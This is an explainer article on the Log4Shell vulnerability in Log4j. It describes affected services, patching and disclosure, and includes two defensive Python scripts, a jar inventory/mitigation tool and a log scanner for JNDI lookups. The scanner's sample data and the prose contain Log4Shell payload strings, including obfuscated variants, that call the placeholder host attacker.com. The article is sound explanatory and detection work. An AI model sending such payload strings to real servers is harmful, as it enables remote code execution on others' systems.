Background information

Log4Shell security vulnerability: Steam, Apple, Minecraft and many more are vulnerable

Log4Shell is one of the biggest security vulnerabilities of recent years. The affected logging library, Log4j, is found in a huge share of Java applications. There’s a risk of data loss. Or worse.

As of December 9, 2021, Log4j is generally considered a threat to all PC, smartphone, game console, and Internet users. The library contains a vulnerability that allows attackers to run code of their choosing on an affected system. That’s called Remote Code Execution.

Outside of developer circles, Log4j is virtually unknown. And that’s quite reasonable: the logging component works in the background of Java applications, recording errors and other events so that developers can see what the software did. But horrifyingly, that library opens the door to malicious hackers. What’s worse, Log4j is extremely widespread, which is why a whole load of systems are vulnerable.

Here are just some of the potential victims:

  • Apple
  • Tencent
  • Steam
  • Twitter
  • Baidu
  • CloudFlare
  • Amazon
  • Tesla
  • Minecraft
  • VMWare
  • WebEx
  • LinkedIn

This list isn’t exhaustive, and it’s only intended to give an idea of how extensive the problem is.

The vulnerability has been christened Log4Shell.

What can users do against Log4Shell? How to protect yourself?

I’m afraid that, for the most part, you’re at the mercy of Log4Shell. Security expert Manuel Atug advises the following measures:

  1. Backup all your personal data.
  2. Install any update that’s offered in the coming days.

What can administrators do against Log4Shell?

Administrators have a direct fix at their disposal: update the library. A patched Log4j removes Log4Shell from their servers.

The vulnerability was closed in Log4j 2.15.0 (some early reports referred to its release candidate, 2.15.0-rc2). If Log4j is running on version 2.15.0 or later, the vulnerable code path is no longer there. Two caveats for practitioners: later 2.x releases fixed follow-on issues in the same lookup code, so the target should be the current 2.x release rather than 2.15.0 specifically, and where an immediate upgrade isn’t possible, the stop-gap Apache documented for older 2.x builds is to delete the JndiLookup class from the log4j-core jar.

This fix was already in the official Log4j repository before the vulnerability was published. That’s what «Responsible Disclosure» means: Alibaba’s engineers worked with the Apache Software Foundation and agreed to keep the details secret until Apache had a fix ready.

To find out whether your own systems are affected, security firm Huntress Labs has released the log4shell-tester tool. It generates a test lookup string that you feed into an application; if the application then contacts the tester’s server, it is running Log4j in a vulnerable, non-updated configuration. This checks whether an application actually performs the lookup, which says more than the version number alone, but it only covers the inputs you try.
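The other half of the check is an inventory of the Log4j jars on disk. The following script is an added example written for this article, not a Huntress or Apache tool: it walks a directory tree, reads the version from each log4j-core jar’s Maven pom.properties, checks whether the JndiLookup class is present, and can write a mitigated copy of a jar with that class removed, the stop-gap Apache documented for installations that can’t upgrade immediately. The version threshold is the CVE-2021-44228 fix release, 2.15.0; a jar below it is reported only while it still contains JndiLookup.class. The two jars it scans are constructed fixtures that mimic log4j-core’s layout, not real Log4j builds, and names such as demo() and build_sample_jar() are the example’s own.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# The class implementing the ${jndi:...} lookup in log4j-core 2.x, i.e. the code path Log4Shell abuses
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped inside real log4j-core jars; it carries the version string
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# First release containing the CVE-2021-44228 fix (later 2.x releases fixed follow-on issues)
FIXED_VERSION = (2, 15, 0)


def parse_version(pom_text):
    """Return (major, minor, patch) from a 'version=2.14.1' line, or None if it is absent."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_text, re.M)
    return tuple(int(x) for x in m.groups()) if m else None


def inspect_jar(jar_path):
    """Describe one jar: declared version and whether JndiLookup.class is still inside it."""
    with zipfile.ZipFile(jar_path) as zf:
        names = set(zf.namelist())
        version = parse_version(zf.read(POM_PROPERTIES).decode()) if POM_PROPERTIES in names else None
    return {"jar": Path(jar_path).name, "path": str(jar_path),
            "version": version, "has_jndi_lookup": JNDI_LOOKUP_CLASS in names}


def is_vulnerable(info):
    """True when the jar still carries the JNDI lookup and predates the 2.15.0 fix.
    A jar whose version cannot be read but still contains the class is treated as vulnerable."""
    if not info["has_jndi_lookup"]:
        return False
    v = info["version"]
    return v is None or (v[0] == 2 and v < FIXED_VERSION)


def scan_tree(root):
    """Walk a directory tree and inspect every log4j-core jar in it."""
    return [inspect_jar(p) for p in sorted(Path(root).rglob("log4j-core*.jar"))]


def strip_jndi_lookup(jar_path, out_path):
    """Write a copy of the jar without JndiLookup.class (ZIP entries can't be deleted in place, so copy the rest)."""
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(out_path, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename != JNDI_LOOKUP_CLASS:
                dst.writestr(item, src.read(item.filename))
    return out_path


def build_sample_jar(path, version):
    """Constructed fixture: a minimal jar with log4j-core's layout, not a real Log4j build."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")  # placeholder bytes
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return path


def demo():
    """Scan a temporary tree holding a pre-fix and a post-fix jar, mitigate the vulnerable one,
    and return {jar name: vulnerable?} for the originals and the mitigated copy."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "lib").mkdir()
        build_sample_jar(root / "log4j-core-2.14.1.jar", "2.14.1")
        build_sample_jar(root / "lib" / "log4j-core-2.17.1.jar", "2.17.1")
        verdicts = {}
        for info in scan_tree(root):
            verdicts[info["jar"]] = is_vulnerable(info)
            if verdicts[info["jar"]]:
                fixed = strip_jndi_lookup(info["path"], root / ("mitigated-" + info["jar"]))
                verdicts[Path(fixed).name] = is_vulnerable(inspect_jar(fixed))
        return verdicts


if __name__ == "__main__":
    for jar, vulnerable in demo().items():
        print(f"{jar}: {'VULNERABLE' if vulnerable else 'ok'}")
```

Point scan_tree() at a real application directory to get the same dictionaries for your own jars. Shaded or renamed jars that don’t carry the Maven metadata show up with version None and are flagged as long as the class is present, which is deliberate: an unknown version with the lookup code still in place is not something to wave through.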

What is Log4j?

Log4j is a logging tool. It records system events that can be studied by server operators to troubleshoot or improve performance.

Log4j isn’t a new component, but it is regularly updated. It was created by coder Ceki Gülcü and published in 2001; the Log4j 2 branch in use today is a later rewrite, and only that branch (versions 2.0-beta9 up to 2.14.1) contains the JNDI lookup feature behind Log4Shell. The most recent update before the vulnerability was published is dated December 6, 2021. In this update, a fix for the vulnerability was included.

Log4j is open source and can be used by everyone.

It’s written in the Java programming language and is consequently used by Java applications. Java is often used in the development of web applications.

Log4j is so widespread, in fact, that security vendor Malwarebytes says the vulnerability is «everywhere» – even on Mars.

What is Log4Shell?

The vulnerability in Log4j has been given its own name due to its severity. It’s called «Log4Shell». In security circles, the term «shell» suggests that an attacker can use the vulnerability to execute their own code on a computer.

Log4Shell isn’t something you’d notice on your smartphone or computer as such. The vulnerability is present in every application that uses Log4j, and a great many of those run on servers, since that’s where the software using Log4j lives.

After its discovery, Log4Shell received a severity rating: a CVSS score of 10 out of 10, the maximum. It was assigned the identifier CVE-2021-44228 by MITRE, the organisation that runs the CVE vulnerability catalogue.

In short: a malicious hacker can run arbitrary malicious code on countless servers all over the world, and on embedded products such as Cisco network equipment that ships Java software.

What’s worse: Log4Shell is extremely easy to exploit.

What is Remote Code Execution?

Remote Code Execution allows you to, well, execute code remotely. An attacker can sit in the Bahamas and execute code on a Swiss computer, even control it. That’s not how it usually works: ordinarily, a computer only runs code that its owner has installed or launched, and even on a Windows or macOS system, permissions, sandboxing and malware scanners stand between outside input and code execution.

Remote Code Execution gets around all of that. An attacker can do anything to your system that the vulnerable process is allowed to do, whether that’s simply crashing your Minecraft server or downloading a copy of all the customer data from your web store.

In the case of Log4Shell, a simple string of characters is enough to execute foreign code on a vulnerable server, such as those of gaming distribution platform Steam, without security mechanisms kicking in.

How does Log4Shell work?

Log4Shell works in several steps, which is how the vulnerability survived undetected from 2013, when the JNDI lookup feature was added in Log4j 2.0-beta9, until December 2021. Log4Shell is only triggered when Log4j logs a string containing a lookup expression that invokes the «Java Naming and Directory Interface» (JNDI). This malicious string, called a «payload» in technical jargon, looks like this in the following abstract example:

[Image: the one-line payload] It only takes one line of code to make the attack a success.

attacker.com is a website controlled by the attacker.

The security company LunaSec describes the Log4Shell process as follows:

  1. Data from an attacker is transmitted to the server via any protocol (a web request header or a chat message, for instance).
  2. The server writes the data to a log using Log4j. If this data contains the payload and addresses JNDI, Log4j resolves the lookup and sends a request to the attacker’s server.
  3. The attacker’s server response contains the second part of the attack. As an example, LunaSec gives the address http://second-stage.attacker.com/Exploit.class, which points to a Java class file.
  4. The vulnerable process on the server loads and runs the code fetched from attacker.com. That’s actual code injection.
  5. This injected code opens the door for an attacker to execute more code.

The first stage only makes the server reach out to the attacker; the second stage delivers the code that actually runs, and that is what gives the attacker a foothold to do damage or steal data.
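To make the first stage concrete from the defender’s side, here is an added detection example written for this article, not code from LunaSec or the Log4j project. It runs over a few constructed web-server log lines and flags the lookup strings that would trigger step 2 above, including the obfuscated forms attackers used in the first days (nested ${lower:...} lookups and ${key:-default} default-value lookups that hide the literal text jndi:), by emulating how Log4j resolves nested lookups from the inside out before checking for ${jndi:...}. attacker.com is the placeholder host from the text; the log lines in SAMPLE_LOG are constructed, and the function names are the example’s own.

```python
import re

# Innermost ${...} lookup: one that contains no further '$', '{' or '}'
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalisation: protocol and host, e.g. ${jndi:ldap://attacker.com/a}
JNDI_TARGET = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)", re.I)

# Constructed sample log lines in Apache combined-log style, not captured traffic
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.com/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.com/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.com/a} HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:rmi://attacker.com/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:05 +0000] "GET /checkout?price=${amount} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]


def resolve_innermost(content):
    """Emulate the Log4j lookups attackers use to hide the text 'jndi:'.
    Returns the replacement text for one ${content} expression."""
    if ":-" in content:                       # ${key:-default} with an unknown key resolves to the default
        return content.split(":-", 1)[1]
    lowered = content.lower()
    if lowered.startswith("lower:"):
        return content[6:].lower()
    if lowered.startswith("upper:"):
        return content[6:].upper()
    return content                            # any other lookup: keep the text, drop the braces


def normalize(text, max_rounds=100):
    """Collapse nested and obfuscated lookups from the inside out, the order Log4j evaluates them.
    A JNDI lookup is frozen once it surfaces so the rest of the line keeps resolving."""
    for _ in range(max_rounds):
        m = INNERMOST.search(text)
        if m is None:
            break
        content = m.group(1)
        if content.lower().startswith("jndi:"):
            repl = "\x01" + content + "\x02"   # placeholder braces keep it out of the next search
        else:
            repl = resolve_innermost(content)
        text = text[:m.start()] + repl + text[m.end():]
    return text.replace("\x01", "${").replace("\x02", "}")


def scan_lines(lines):
    """Return (line_no, scheme, host) for every JNDI lookup found after normalisation."""
    findings = []
    for n, line in enumerate(lines, 1):
        for scheme, host in JNDI_TARGET.findall(normalize(line)):
            findings.append((n, scheme.lower(), host))
    return findings


if __name__ == "__main__":
    for n, scheme, host in scan_lines(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup via {scheme} to {host}")
```

The fifth sample line contains an ordinary ${amount} placeholder and is not flagged, which is the point of resolving the lookups rather than grepping for «${»: a plain search for the string jndi would miss lines 2 to 4, while a search for any ${ would drown the analyst in false positives. The host extracted from each finding is what you would block at the egress firewall and search for in DNS and LDAP logs.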

Who discovered Log4Shell?

Log4Shell was discovered by Chen Zhaojun, a member of the Alibaba Cloud Security Team. He informed the Log4j developers and published the vulnerability together with them on December 9, 2021. This gave the developers time to fix the vulnerability, test the fix, and push a patch to the GitHub repository, so that affected operators could repair their systems immediately. In technical jargon, this is referred to as «Responsible Disclosure».

The risk in JNDI itself isn’t new. Back in 2016, security researchers Alvaro Muñoz and Oleksandr Mirosh presented JNDI injection attacks at the Black Hat security conference.

Is Log4Shell being used by malicious hackers?

Yes. Within a few hours of its publication, over 500 exploitation attempts by unknown actors had been reported. However, as far as we know, the attacks haven’t been targeted. They don’t have to be, because Log4j is used everywhere. All a malicious hacker’s script needs to do is submit the first part of the attack to arbitrary servers. If a server calls back, the second phase of the attack is started automatically. If there’s no response or the attempt is blocked, so be it.

We don’t know what kind of payloads have been included in every attack. Security researcher John Hammond mentions «botnets and Bitcoin miners», but ransomware or Trojans are just as possible.

What about us?

«Our own developments, including the stores, aren’t affected by Log4Shell. They don’t use Java,» says Martin Wrona, Security Software Engineer at digitec Galaxus.

Nevertheless, our security engineers were busy. Some internal systems that you never come into contact with as an end customer – warehouse systems, for example – are Java-based. As are other parts of the company’s infrastructure. Where there’s Java, Log4j and with it Log4Shell are rarely far away: «We had a lot of work to do, but currently all systems are patched or mitigated by configuration,» says Martin.


Journalist. Author. Hacker. A storyteller searching for boundaries, secrets and taboos – putting the world to paper. Not because I can but because I can’t not.
